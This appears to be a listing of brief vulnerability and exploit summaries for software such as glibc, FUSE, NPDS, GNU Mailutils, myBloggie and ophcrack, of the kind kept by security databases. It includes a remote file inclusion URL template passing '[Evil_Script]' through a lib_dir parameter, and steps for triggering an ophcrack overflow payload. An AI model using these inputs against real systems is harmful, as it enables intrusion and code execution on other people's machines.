This exploit takes advantage of a glibc bug to escalate privileges and read the /etc/shadow file. It is specifically designed for glibc versions 2.1.9x and above.
FUSE is susceptible to a local information disclosure vulnerability. This issue is due to a failure of the kernel module to properly clear used memory prior to its reuse. This vulnerability allows malicious local users to gain access to potentially sensitive kernel memory, aiding them in further attacks.
Multiple vulnerabilities in NPDS allow remote attackers to carry out HTML injection, cross-site scripting, and SQL injection attacks. These vulnerabilities can result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
This exploit allows an attacker to sign up with admin privileges by making the admin visit a CSRF script.
Variable $lib_dir not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. The exploit URL is http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]
The 'header_get_field_name()' function in the 'mailbox/header.c' source file of GNU Mailutils mail is vulnerable to a buffer overflow. This vulnerability can be exploited by sending a specially crafted email to the affected software, allowing an attacker to execute arbitrary code on the affected computer with the privileges of the user who started the affected application.
TOPo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Variable $templatePath not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
An attacker can exploit these vulnerabilities in myBloggie to carry out cross-site scripting, HTML injection, and SQL injection attacks. This can lead to theft of authentication credentials, disclosure of sensitive data, and other potential attacks. The attacker can also compromise the integrity of the site by deleting arbitrary comments.
Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well). In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash. pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload. pwdump6_setup itself doesn't look to be exploitable outside of ophrack. Kudos to Hostess for pointing me to http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
Services By CQR